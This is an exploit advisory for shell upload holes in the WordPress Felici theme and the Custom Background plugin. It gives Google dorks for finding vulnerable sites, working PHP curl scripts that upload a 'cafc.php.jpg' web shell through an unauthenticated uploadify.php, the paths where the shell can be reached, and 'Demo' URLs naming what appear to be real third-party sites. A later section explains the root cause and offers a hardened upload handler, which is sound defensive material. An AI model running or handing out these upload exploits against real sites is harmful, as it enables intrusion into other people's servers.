WordPress Felici and Custom Background Shell Upload, Windows 7, CaFc Versace
######################################################################################
# Exploit Title : WordPress Felici Shell Upload
# Google Dork : inurl:"/wp-content/themes/felici/"
# Date : 23-03-2014
# Exploit Author : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on : Windows 7
# Contact : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
Proof of Concept:
-------------------------------------------------------------------------------------
<?php
// Local file to upload; the double extension is what the advisory relies on.
$uploadfile = "cafc.php.jpg";
$target = "http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php";

// PHP >= 5.5 needs CURLFile; the "@file" form was removed in PHP 7.
$file = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => $file));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    die("curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
print "$postResult\n";
?>
-------------------------------------------------------------------------------------
Exploit:
-------------------------------------------------------------------------------------
Shell Access : http://victim/wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/cafc.php.jpg
---------------------------------------------------------------------------------------
Demo : http://theportlander.co.uk/wp-content/themes/felici/sprites/js/uploadify/uploadify.php
---------------------------------------------------------------------------------------
######################################################################################
# Exploit Title : WordPress Custom Background Shell Upload
# Google Dork : inurl:"/wp-content/plugins/custom-background/"
# Date : 23-03-2014
# Exploit Author : CaFc Versace
# Tested on : Windows 7
# Contact : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
Proof of Concept:
-------------------------------------------------------------------------------------
<?php
// Local file to upload; the double extension is what the advisory relies on.
$uploadfile = "cafc.php.jpg";
$target = "http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php";

// PHP >= 5.5 needs CURLFile; the "@file" form was removed in PHP 7.
$file = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $file,
    // The bundled handler takes the destination directory from this field.
    'folder'   => '/wp-content/plugins/custom-background/uploadify/',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    die("curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
print "$postResult\n";
?>
-------------------------------------------------------------------------------------
Exploit:
-------------------------------------------------------------------------------------
Shell Access : http://localhost/wp-content/plugins/custom-background/uploadify/cafc.php.jpg
or find your shell at: http://localhost/wp-content/uploads/[year]/[month]/
---------------------------------------------------------------------------------------
Demo : http://lakeofthewoodsmn.com/wp-content/plugins/custom-background/uploadify/uploadify.php
---------------------------------------------------------------------------------------
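Both advisories above hit the same root cause: the example uploadify.php handler bundled with the Uploadify library, which these themes/plugins ship without authentication, writes whatever arrives in `Filedata` to disk under its original file name, and (as the Custom Background case shows) into a directory the client names in the `folder` field. The `cafc.php.jpg` name then works wherever the web server maps any `.php` segment of a multi-extension file name to the PHP handler, as Apache's mod_mime does with an `AddHandler` rule. The handler below is an added example, not code from Felici, Custom Background or Uploadify: it shows the checks the bundled handler lacks. It assumes PHP 7 or later, a fixed server-side target directory, and that the host application provides `current_user_can()` and `wp_verify_nonce()` (WordPress, with wp-load.php already included) and sends the nonce in a POST field named `_wpnonce`; those names are assumptions, not something the advisory states.

```php
<?php
// Added example (not the bundled Uploadify handler): an upload endpoint that
// authenticates the caller, ignores the client-supplied "folder" field, and
// never writes a file under the name the client chose.

declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploaded';          // fixed server-side, never from the request
const ALLOWED    = ['jpg'  => 'image/jpeg', 'jpeg' => 'image/jpeg',
                    'png'  => 'image/png',  'gif'  => 'image/gif'];
const MAX_BYTES  = 2 * 1024 * 1024;

/**
 * Validate one $_FILES entry and store it under a random name.
 * Returns the stored file name; throws RuntimeException on any failure.
 */
function store_image(array $f, string $dir = UPLOAD_DIR): string
{
    $err = $f['error'] ?? UPLOAD_ERR_NO_FILE;
    if ($err !== UPLOAD_ERR_OK) {
        throw new RuntimeException("upload failed: error $err");
    }
    if (($f['size'] ?? 0) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Only accept a file PHP itself received via HTTP POST.
    if (!is_uploaded_file($f['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // The extension check alone is not enough: "cafc.php.jpg" passes it.
    // That is why the original name is discarded below and the content sniffed.
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException("extension .$ext not allowed");
    }

    // Trust magic bytes, not the client's file name or Content-Type header.
    $info = getimagesize($f['tmp_name']);
    if ($info === false || $info['mime'] !== ALLOWED[$ext]) {
        throw new RuntimeException('content is not ' . ALLOWED[$ext]);
    }

    // Random name + allow-listed extension: a multi-extension name such as
    // "x.php.jpg" never reaches the filesystem, whatever the web server's
    // handler mapping does with it.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;

    if (!is_dir($dir) && !mkdir($dir, 0755, true)) {
        throw new RuntimeException('cannot create upload directory');
    }
    $dest = $dir . '/' . $name;
    if (!move_uploaded_file($f['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0644);   // readable, never executable
    return $name;
}

// Request handling. Assumed host-app hooks: current_user_can() and
// wp_verify_nonce() exist (WordPress bootstrapped) and the client sends the
// nonce as POST field "_wpnonce". Adapt the gate to whatever session check
// the host application actually provides; the point is that anonymous
// callers are refused before any file is touched.
if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/plain');
    if (!function_exists('current_user_can')
        || !current_user_can('upload_files')
        || !wp_verify_nonce((string)($_POST['_wpnonce'] ?? ''), 'uploadify_upload')) {
        http_response_code(403);
        exit('forbidden');
    }
    try {
        echo store_image($_FILES['Filedata'] ?? []);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . $e->getMessage();
    }
}
```

Run with the advisory's own PoC against this handler and the request is refused at the nonce check; with a valid nonce, `cafc.php.jpg` is rejected because `getimagesize()` finds no image data, and a genuine JPEG is stored as a random `.jpg` name in the fixed directory, so the `folder` field in the second PoC has no effect. Independently of the handler, the directories these uploaders write to (`sprites/js/cufon-fonts/uploaded/` for Felici, the plugin's `uploadify/` directory for Custom Background) should have script execution disabled at the web-server level, which blocks the "Shell Access" step even on a site where the vulnerable handler is still reachable.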
Credits: Agency CaFc
Thanks : SurabayaBlackhat
./learn to be better